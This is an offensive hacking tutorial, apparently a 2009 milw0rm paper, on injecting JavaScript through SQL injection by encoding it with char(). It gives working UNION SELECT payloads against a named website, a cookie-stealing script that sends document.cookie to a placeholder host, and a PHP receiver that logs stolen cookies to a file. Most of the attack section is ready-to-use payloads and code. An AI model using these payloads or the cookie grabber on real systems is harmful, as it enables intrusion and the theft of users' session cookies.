XFS - XSS From SQL
Author : 599eme Man
Contact : flouf@live.fr
[------------------------------------------------------------------------]
[+] Summary
[1] Presentation
[2] Explanation
[3] Demonstration
[4] Bibliography
[------------------------------------------------------------------------]
[1] --[Presentation]--
XFS is a SQL deviation who lets return javascript code by through of the function char().
This function convert an ASCII code to char, this why we'll use it to execute javascript code.
The XFS can give you a restricted XSS possibility and obviously the SQL vulnerabilty.
So for XFS we need :
- String to ASCII converter
- The function char()
In the next parties you will see the conditions for do it, how it work and demonstration.
[2] --[Explanation]--
To use it, you need to convert your string in ASCII (Online Converter : http://www.easycalculation.com/ascii-hex.php).
Char() will read the ASCII code and return it, so if you insert the ASCII javascript code, char() will return you the
javascript code and it will be executed BUT when you encode your javascript code, this code mustn't have any space, so the XSS is restricted
but you can grab, alert and a lot of other XSS thing.
Example :
If you want convert your javascript code to ASCII, for work, the javascript code mustn't to be like it :
<script > alert(document.cookie) </script> <= You need to delete space :
<script>alert(document.cookie)</script> <= Its okay, you can convert it in ASCII
When the code will be convert in ASCII, you will get a thing like it :
46 65 42 12 85 68 ...
But before put it in char(ASCII), we need to replace space by "," like it :
46,65,42,12,85,68 ... <= Its okay for put in char()
[3] --[Demonstration]--
Vuln website :
- http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,char(ASCII_CODE),7,8--
Some javascript codes without space :
Alert :
################################
#
#- String : <SCRIPT>alert('xss')</script>
#
#- ASCII : 60 83 67 82 73 80 84 62 97 108 101 114 116 40 39 120 115 115 39 #41 60 47 115 99 114 105 112 116 62
#
################################
Cookie Grabber :
################################
#
#- String : <SCRIPT>location.href='http://www.yoursite.com/cookie.php?#cookie='+escape(document.cookie)</SCRIPT>
#
#- ASCII : 60 83 67 82 73 80 84 62 108 111 99 97 116 105 111 110 46 104 114 101 102 61 39 104 116 116 112 58 47 47 119 119 119 46 121 111 117 114 115 105 116 101 46 99 111 109 47 99 111 111 107 105 101 46 112 104 112 63 99 111 111 107 105 101 61 39 43 101 115 99 97 112 101 40 100 111 99 117 109 101 110 116 46 99 111 111 107 105 101 41 60 47 83 67 82 73 80 84 62
#
################################
Cookie Grabber file :
################################
#
# <?php
#
#
$cookies = $_GET["cookie"];
#
# if($cookies)
# {
#
# $grab = fopen("grab.txt","a");
# fputs($grab, $cookies . "\r\n");
# fclose($grab);
#
# }
#
# ?>
#
################################
So before insert your ASCII in char(), you must replace (in the ASCII code) all space by ",".
Example :
################################
# 45 52 86 23 54 ...
# To :
# 45,52,86,23,54 ...
################################
So lets go :
Alert :
http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,char(60,83,67,82,73,80,84,62,97,108,101,114,116,40,39,120,115,115,39,41,60,47,115,99,114,105,112,116,62),7,8--
You can see a textbox is executed with the text : "XSS" => it's the XSS alert
[4] --[Bibliography]--
SQL tutorial :
SQL Injection Paper : http://milw0rm.com/papers/16 By Zeroday
Uncommon SQL Injection : http://milw0rm.com/papers/174 By N3T D3VIL
Full SQL Injection Tutorial (MySQL) : http://milw0rm.com/papers/202 by Marezzi
Introduction to SQL injection : http://milw0rm.com/papers/225 by Dapirates
Full SQL injection Tutorial : http://milw0rm.com/papers/349 By Moudi
Avoiding SQL Injection : http://milw0rm.com/papers/358 By Moudi
[------------------------------------------------------------------------]
[Thanks to] : Moudi, J.consultant, Sheiry, Pr0h4ck3rz, Stacker, Shimik Root aka Str0zen & Security-Shell Community
# milw0rm.com [2009-08-04]
